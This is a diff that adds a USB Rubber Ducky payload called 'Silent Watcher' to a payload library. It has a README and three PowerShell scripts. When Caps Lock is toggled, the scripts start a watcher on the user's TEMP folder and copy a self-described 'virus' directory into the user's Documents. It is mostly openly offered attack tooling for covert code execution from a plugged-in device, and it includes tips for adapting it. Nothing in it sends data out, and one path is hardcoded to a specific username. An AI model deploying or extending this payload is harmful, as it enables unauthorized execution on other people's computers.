Silent-Watcher

payloads/library/recon/Silent-Watcher/README.md

@@ -0,0 +1,27 @@
+# Silent Watcher
+
+This is a combination of a DuckyScript payload and a virus template that I created.
+To use it, compile `payload.txt` and add it to the root directory of your hotplug. BE SURE TO READ THE CODE!
+Some variables are specific to your use case and you may find it in your interest to change the for your purposes.
+This program is designed to work on any machine that operates on Windows 11 and higher.
+
+# How Does It Work?
+
+When the primed hotplug is inserted into the host machine, it will wait for "CAPSLOCK" to toggle on. This is INTENTIONAL, this is intended to be most effective as a waiting game of sorts. The program will then open a powershell window and run `event.ps1` from the virus directory in the hotplug.
+When the `event.ps1` is run, it will listen for any change in the `TEMP` directory of the current user. Once a change is heard, `event.ps1` starts `call.ps1`.
+`call.ps1` will then begin a chain reaction which results in `pull.ps1` being copied into "User\$yourUsername\Documents\virus\Virus" and then run.
+`pull.ps1` then copies the rest of the "virus" directory of the hotplug into the newely created "Virus" directory.
+
+# Tips
+
+You can change this program to most use cases, should there be another directory you would prefer to listen to, change the PATH in `event.ps1` to your desired directory.
+You can also change the timer in the same file to your desired time if you are more patient.
+The copy directory can be changed as well by changing the PATH in both the `call.ps1` and `pull.ps1` scripts
+
+# Disclaimer
+
+I do not take responsibility for any malicious use of this program by others. This is a proof of concept for my own sense of accomplishment, and as such is intended only for educational use. Use this program at your own discretion!
+
+   **The Creator**
+
+   -- Mavis

payloads/library/recon/Silent-Watcher/virus/call.ps1

@@ -0,0 +1,22 @@
+
+$driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE label='DUCKY'").DriveLetter
+$localUsername = $env:USERNAME
+New-Item -Path "C:\Users\$localUsername\Documents" -Name 'virus' -ItemType "directory"
+New-Item -Path "C:\Users\$localUsername\Documents\virus" -Name 'Virus' -ItemType "directory"
+$pullPathBeforeCopy = Get-ChildItem -Path "$driveLetter\virus" -Recurse -Filter "pull.ps1"
+
+$pathBeforeCopy = Get-ChildItem -Path "$driveLetter\" -Directory -Recurse -Filter "virus"
+$pathAfterCopy = "C:\Users\$localUsername\Documents\virus"
+
+Copy-Item -Path $pathBeforeCopy -Destination $pathAfterCopy -Recurse
+Copy-Item -Path $pullPathBeforeCopy -Destination $pathAfterCopy\Virus
+
+$time_in_seconds = 10
+while ($time_in_seconds -gt 0) {
+    #Write-Host "Time remaining: $seconds"
+    Start-Sleep -Seconds 1
+    $time_in_seconds--
+}
+Start-Process powershell -ArgumentList "-File", "$pathAfterCopy\Virus\pull.ps1"
+
+exit

payloads/library/recon/Silent-Watcher/virus/event.ps1

@@ -0,0 +1,58 @@
+$folder = "C:\Users\$env:USERNAME\AppData\Local\Temp\"
+$filter = "*.LOG"
+$Watcher = New-Object IO.FileSystemWatcher $folder, $filter -Property @{ 
+    IncludeSubdirectories = $false
+    NotifyFilter = [IO.NotifyFilters]'FileName, LastWrite'
+}
+$onCreated = Register-ObjectEvent $Watcher -EventName Created -SourceIdentifier FileCreated -Action {
+   $path = $Event.SourceEventArgs.FullPath
+   $name = $Event.SourceEventArgs.Name
+   $changeType = $Event.SourceEventArgs.ChangeType
+   $timeStamp = $Event.TimeGenerated
+   Write-Host "The file '$name' was $changeType at $timeStamp"
+   Write-Host $path
+   #Move-Item $path -Destination $destination -Force -Verbose
+}
+
+Function Register-Watcher {
+    param ($folder)
+    $filter = "*.*" #all files
+    $watcher = New-Object IO.FileSystemWatcher $folder, $filter -Property @{ 
+        IncludeSubdirectories = $false
+        EnableRaisingEvents = $true
+    }
+
+    $changeAction = [scriptblock]::Create('
+        # This is the code which will be executed every time a file change is detected
+        $path = $Event.SourceEventArgs.FullPath
+        $name = $Event.SourceEventArgs.Name
+        $changeType = $Event.SourceEventArgs.ChangeType
+        $timeStamp = $Event.TimeGenerated
+        Write-Host "The file $name was $changeType at $timeStamp"
+        Invoke-Expression -Command .\call.ps1
+        if (Test-Path -Path "C:\Users\mason\Documents\virus") {
+            Write-Host "Directory already exists"
+            Get-EventSubscriber -Force | Unregister-Event -Force | exit
+
+        } else {
+            Invoke-Expression -Command .\call.ps1 
+        }
+    ')
+
+    Register-ObjectEvent $Watcher -EventName "Changed" -Action $changeAction
+}
+
+ Register-Watcher "$folder"
+ $seconds = 60
+ while ($seconds -gt 0) {
+     Write-Host "Time remaining: $seconds"
+     Start-Sleep -Seconds 1
+     $seconds--
+ }
+Write-Host "Script Finished!"
+
+
+
+Get-EventSubscriber -Force | Unregister-Event -Force
+exit
+

payloads/library/recon/Silent-Watcher/virus/pull.ps1

@@ -0,0 +1,9 @@
+$localUsername = $env:USERNAME
+$driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE label='DUCKY'").DriveLetter
+$callPathBeforeCopy = Get-ChildItem -Path $driveLetter\virus -Recurse -Filter "call.ps1"
+$callMoveDir = "C:\Users\$localUsername\Documents\virus\Virus\call.ps1"
+$eventPathBeforeCopy = Get-ChildItem -Path $driveletter\virus -Recurse -Filter "event.ps1"
+$eventMoveDir = "C:\Users\$localUsername\Documents\virus\Virus\event.ps1"
+
+Copy-Item -Path $callPathBeforeCopy -Destination $callMoveDir
+Copy-Item -Path $eventPathBeforeCopy -Destination $eventMoveDir